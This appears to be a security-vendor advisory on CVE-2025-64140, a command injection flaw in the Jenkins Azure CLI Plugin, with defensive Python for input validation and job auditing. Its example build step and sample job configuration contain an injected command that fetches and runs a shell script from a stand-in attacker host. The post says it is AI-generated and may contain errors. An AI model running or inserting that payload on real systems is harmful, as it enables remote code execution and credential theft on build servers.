Jenkins Azure CLI Plugin CVE-2025-64140 Command Injection: Brief Summary and Technical Review

This post provides a brief summary and technical review of CVE-2025-64140, a command injection vulnerability in Jenkins Azure CLI Plugin 0.9 and earlier. The flaw allows attackers with Item/Configure permission to execute arbitrary shell commands on the Jenkins controller. No patch is available as of publication.
CVE Analysis

8 min read

ZeroPath CVE Analysis

2025-10-29

Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

Introduction

Attackers holding only Item/Configure permission in Jenkins can execute arbitrary shell commands on the Jenkins controller by abusing the Azure CLI Plugin. Because that permission is commonly held by ordinary job authors, this vulnerability directly exposes CI/CD infrastructure to remote code execution, credential theft, and supply chain compromise.

About Jenkins and the Azure CLI Plugin: Jenkins is one of the most widely adopted open source automation servers, powering continuous integration and deployment for organizations of all sizes. The Azure CLI Plugin enables Jenkins jobs to interact with Microsoft Azure resources by running Azure CLI commands as part of build steps. While not as ubiquitous as core Jenkins plugins, it is used in environments where Azure integration is critical to DevOps workflows. The plugin has not seen active development since 2018, which is relevant to its security posture.

Technical Information

CVE-2025-64140 is a command injection vulnerability (CWE-78) present in Jenkins Azure CLI Plugin version 0.9 and all earlier versions. The plugin allows users with Item/Configure permission to define Azure CLI commands to be executed during build steps. These commands are passed directly to the shell on the Jenkins controller without any validation, escaping, or restriction. As a result, an attacker can inject shell metacharacters (such as ;, &&, |) and append arbitrary commands to the legitimate Azure CLI invocation.

For example, a Jenkins job configuration might include a build step like this:

az group create --name myGroup --location eastus; curl http://attacker.example.com/shell.sh | sh

The shell interprets everything after the semicolon as a separate command, so both the Azure CLI command and the attacker's payload are executed with the privileges of the Jenkins process. This enables remote code execution, credential theft, lateral movement, and persistent compromise of the Jenkins controller.

The vulnerability is exploitable by any user with Item/Configure permission, a right commonly granted to developers and automation engineers. The risk is amplified further when jobs are allowed to run on the Jenkins controller itself rather than being confined to remote agents.
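To make the mechanism concrete, the following Python is an added illustration (not the plugin's code, which is Java, and not part of the ZeroPath advisory). It shows how a POSIX shell would split the advisory's example step into three separate commands when the raw text is handed to `sh -c`, and beside it the allow-list validation and argv-only spawning that a build step could use instead. The `az` invocation and the `attacker.example.com` host are taken from the advisory; everything else is constructed for the example.

```python
import shlex
import subprocess

# Constructed inputs: the benign step and the injected variant from the advisory text.
BENIGN_STEP = "az group create --name myGroup --location eastus"
INJECTED_STEP = ("az group create --name myGroup --location eastus; "
                 "curl http://attacker.example.com/shell.sh | sh")

# Operator tokens at which a POSIX shell starts a new command.
COMMAND_SEPARATORS = {";", "&", "&&", "|", "||"}
# Characters shlex emits as operator tokens when punctuation_chars=True.
OPERATOR_CHARS = set("();<>|&")


def _tokens(step_text: str) -> list[str]:
    """Tokenise like a shell lexer: words, quoted strings and operator tokens."""
    lexer = shlex.shlex(step_text, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def shell_commands(step_text: str) -> list[list[str]]:
    """What `sh -c step_text` would run: one argv list per command.
    This is the effective behaviour of passing the raw step text to a shell,
    which is the pattern the advisory describes."""
    commands, current = [], []
    for token in _tokens(step_text):
        if token in COMMAND_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_step(step_text: str) -> tuple[bool, str]:
    """Allow-list check a build step could apply before spawning anything:
    the text must parse, contain no shell operators, and invoke `az` directly."""
    try:
        tokens = _tokens(step_text)
    except ValueError as exc:  # unbalanced quotes
        return False, f"unparseable step: {exc}"
    operators = [t for t in tokens if t and set(t) <= OPERATOR_CHARS]
    if operators:
        return False, f"shell operators not allowed: {operators}"
    if not tokens or tokens[0] != "az":
        return False, "step must invoke the az executable directly"
    return True, "ok"


def hardened_argv(step_text: str) -> list[str]:
    """Argument vector for spawning without a shell; raises on a rejected step."""
    ok, reason = validate_step(step_text)
    if not ok:
        raise ValueError(reason)
    return _tokens(step_text)


def run_step(step_text: str) -> subprocess.CompletedProcess:
    """Spawn the validated step as an argv list (shell=False). A ';' that slipped
    through would reach az as a literal argument rather than as a separator.
    Requires the az CLI on PATH, so it is only here to show the spawning pattern."""
    return subprocess.run(hardened_argv(step_text), shell=False,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for step in (BENIGN_STEP, INJECTED_STEP):
        print(step)
        print("  shell would run:", shell_commands(step))
        print("  validate_step:", validate_step(step))
```

The two halves of the fix matter independently: spawning from an argument list removes the shell's interpretation of metacharacters entirely, and the allow-list check rejects anything that is not a single `az` invocation so that a surprising argument never reaches the CLI. In a Jenkins plugin the equivalent of `shell=False` is launching through the `Launcher` API with a list of arguments rather than a single concatenated string.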

Affected Systems and Versions

  • Jenkins Azure CLI Plugin version 0.9 and all earlier versions are affected.
  • Any Jenkins instance with the Azure CLI Plugin installed and jobs configured to run on the controller is vulnerable.
  • Exploitation requires Item/Configure permission.
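The two conditions in the list above, an Azure CLI build step being present and the job being able to run on the controller, can be checked from a job's `config.xml`. The script below is an added example written for this review, not ZeroPath's or the plugin's code. `<canRoam>`, `<assignedNode>` and `<builders>` are standard freestyle-project fields; the builder element name `placeholder.AzureCliBuilder` and both sample configurations are constructed, because the advisory does not give the plugin's actual class name, so the tag match is a placeholder to adjust for a real installation.

```python
import re
import xml.etree.ElementTree as ET

# Constructed freestyle-job config.xml that meets both exposure conditions.
EXPOSED_JOB_XML = """<project>
  <description>deploy to azure</description>
  <canRoam>true</canRoam>
  <builders>
    <placeholder.AzureCliBuilder>
      <command>az group create --name myGroup --location eastus; curl http://attacker.example.com/shell.sh | sh</command>
    </placeholder.AzureCliBuilder>
  </builders>
</project>
"""

# Constructed config.xml for the same step pinned to a dedicated agent label.
PINNED_JOB_XML = """<project>
  <description>deploy to azure from a dedicated agent</description>
  <canRoam>false</canRoam>
  <assignedNode>azure-deploy-agent</assignedNode>
  <builders>
    <placeholder.AzureCliBuilder>
      <command>az group create --name myGroup --location eastus</command>
    </placeholder.AzureCliBuilder>
  </builders>
</project>
"""

# Labels under which the controller itself is selected as the executor.
CONTROLLER_LABELS = {"master", "built-in"}
# Coarse screen for shell operators; quoting is ignored, so review hits by hand.
SHELL_OPERATOR_RE = re.compile(r"[;&|`$<>]")


def may_run_on_controller(root: ET.Element) -> bool:
    """True when the job is not pinned to an agent label, or is pinned to the controller."""
    can_roam = (root.findtext("canRoam") or "").strip().lower() == "true"
    label = (root.findtext("assignedNode") or "").strip()
    return can_roam or label in CONTROLLER_LABELS


def azure_cli_steps(root: ET.Element) -> list[str]:
    """Command text of each builder whose element name suggests the Azure CLI plugin
    (placeholder match on the tag name; adjust once the real class name is known)."""
    steps = []
    for builder in root.findall("./builders/*"):
        if "azurecli" in builder.tag.lower():
            steps.append((builder.findtext("command") or "").strip())
    return steps


def audit_job(config_xml: str) -> dict:
    """Summarise one job: plugin present, controller reachable, operators in step text."""
    root = ET.fromstring(config_xml)
    steps = azure_cli_steps(root)
    on_controller = may_run_on_controller(root)
    return {
        "has_azure_cli_step": bool(steps),
        "may_run_on_controller": on_controller,
        "suspicious_steps": [s for s in steps if SHELL_OPERATOR_RE.search(s)],
        "exposed": bool(steps) and on_controller,
    }


if __name__ == "__main__":
    for name, xml in (("exposed", EXPOSED_JOB_XML), ("pinned", PINNED_JOB_XML)):
        print(name, audit_job(xml))
```

Point `audit_job` at each `$JENKINS_HOME/jobs/<name>/config.xml` to get an inventory. A job that can roam only actually lands on the controller if the controller has executors configured, so setting the controller's executor count to zero closes the second condition for every job at once; until a fixed plugin exists, that and tightening who holds Item/Configure are the levers the advisory leaves open.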

Vendor Security History

Jenkins and its plugin ecosystem have experienced multiple command injection and unsafe deserialization vulnerabilities in the past, often due to insufficient input validation or unsafe use of shell execution APIs. The Azure CLI Plugin has not been actively maintained since 2018. The vendor has not released a patch for this issue as of the advisory date.
